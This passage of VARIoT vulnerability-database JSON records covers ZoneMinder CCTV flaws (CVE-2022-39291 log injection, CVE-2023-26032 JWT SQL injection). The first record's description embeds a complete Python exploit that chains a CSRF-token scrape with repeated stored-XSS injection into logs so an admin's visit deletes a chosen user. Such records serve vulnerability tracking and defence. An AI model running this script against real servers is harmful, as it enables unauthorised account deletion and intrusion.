"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0071",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39291",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-39291",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-39291",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39291",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39291",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2022-39291",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-329",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with \"View\" system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the \"/zm/index.php\" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue. ZoneMinder There is an input validation vulnerability in.Information is tampered with and service operation is interrupted (DoS) It may be in a state. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. (Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39291"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39291",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "51071",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"id": "VAR-202210-0071",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "TV",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:08:46.417000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=209968"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
},
{
"problemtype": "Inappropriate input confirmation (CWE-20) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/34ffd92bf123070cab6c83ad4cfe6297dd0ed0b4"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/73d9f2482cdcb238506388798d3cf92546f9e40c"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/cb3fc5907da21a5111ae54128a5d0b49ae755e9b"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/de2866f9574a2bf2690276fad53c91d607825408"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-cfcx-v52x-jh74"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/51071"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39291/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"date": "2022-10-07T21:15:11.770000",
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"date": "2023-03-27T18:15:11.797000",
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Input verification vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
],
"trust": 0.6
}
}
VAR-202302-2186
Vulnerability from variot - Updated: 2025-01-30 19:49ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain SQL Injection via malicious jason web token. The Username field of the JWT token was trusted when performing an SQL query to load the user. If an attacker could determine the HASH key used by ZoneMinder, they could generate a malicious JWT token and use it to execute arbitrary SQL. This issue is fixed in versions 1.36.33 and 1.37.33. ZoneMinder for, SQL There is an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202302-2186",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "gte",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.00"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.33"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.00 that\u0027s all 1.37.33"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"cve": "CVE-2023-26032",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2023-26032",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "LOW",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2023-26032",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-26032",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-26032",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-26032",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-26032",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202302-2022",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2022"
},
{
"db": "NVD",
"id": "CVE-2023-26032"
},
{
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain SQL Injection via malicious jason web token. The Username field of the JWT token was trusted when performing an SQL query to load the user. If an attacker could determine the HASH key used by ZoneMinder, they could generate a malicious JWT token and use it to execute arbitrary SQL. This issue is fixed in versions 1.36.33 and 1.37.33. ZoneMinder for, SQL There is an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-26032"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"db": "VULMON",
"id": "CVE-2023-26032"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-26032",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004652",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2022",
"trust": 0.6
},
{
